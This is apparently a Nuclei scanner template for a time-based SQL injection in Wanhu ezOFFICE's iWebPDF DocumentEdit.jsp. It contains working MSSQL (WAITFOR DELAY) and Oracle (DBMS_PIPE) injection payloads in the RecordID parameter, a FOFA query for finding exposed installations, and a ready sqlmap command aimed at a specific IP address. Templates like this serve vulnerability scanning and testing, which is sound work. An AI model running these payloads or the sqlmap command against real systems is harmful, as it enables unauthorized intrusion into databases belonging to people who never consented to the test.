id: wanhu-ezoffice-iWebPDF-DocumentEdit-sqli
info:
  name: 万户 ezoffice iWebPDF documentedit - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/adysec/nuclei_poc/blob/5e11ca43745bd51a59d3df36d076c79a38aa7793/poc/sql/wanhu-ezoffice-iwebpdf-documentedit-sqli.yaml#L17
  metadata:
    verified: true
    fofa-query: app="万户网络-ezOFFICE"
    hunter-query: demo
    tips:
    repair:
    sqlmap: sqlmap -u "http://39.100.12.65:7001/defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1" -p RecordID --batch --dbms=mssql --risk 3 --level 5 --technique=T
    version:
  tags: 2024,wanhu,oa,sqli,time,ezoffice

http:
  - raw:  
      - |
        @timeout: 15s
        GET /defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
        Host: {{Hostname}}
    
    matchers:
      - type: dsl
        name: mssql
        dsl:
          - contains(body,'iWebPDF')
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and

  - raw:  
      - |
        @timeout: 15s
        GET /defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=1%27%20AND%208611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)%7C%7CCHR(86)%7C%7CCHR(109)%7C%7CCHR(79),6)-- HTTP/1.1
        Host: {{Hostname}}
    
    matchers:
      - type: dsl
        name: oracle
        dsl:
          - contains(body,'iWebPDF')
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and